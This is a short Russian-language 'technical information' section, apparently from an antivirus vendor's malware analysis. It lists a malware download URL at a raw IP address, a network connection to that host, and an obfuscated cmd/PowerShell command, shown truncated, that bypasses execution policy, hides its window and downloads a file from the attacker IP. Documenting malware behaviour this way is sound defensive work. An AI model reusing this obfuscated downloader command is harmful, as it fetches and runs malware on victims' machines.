Техническая информация
- http://84.200.4.102/dwpc.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwershELL^.ExE ^-eX^e^c^UTioN^PO^l^IC^y ^Byp^A^SS -^N^opr^o^F^IL^e -^WI^N^DoWstYlE^ Hi^ddEN ^(New-Obj^ec^T ^S^YStEm^.^n^Et.^WE^B^c^lIeNt).DoWnlOAdfILE^('http://84.200.4.1...
- '84.##0.4.102':80
- '<SYSTEM32>\cmd.exe' /c "pOwershELL^.ExE ^-eX^e^c^UTioN^PO^l^IC^y ^Byp^A^SS -^N^opr^o^F^IL^e -^WI^N^DoWstYlE^ Hi^ddEN ^(New-Obj^ec^T ^S^YStEm^.^n^Et.^WE^B^c^lIeNt).DoWnlOAdfILE^('http://84.200.4.1...' (со скрытым окном)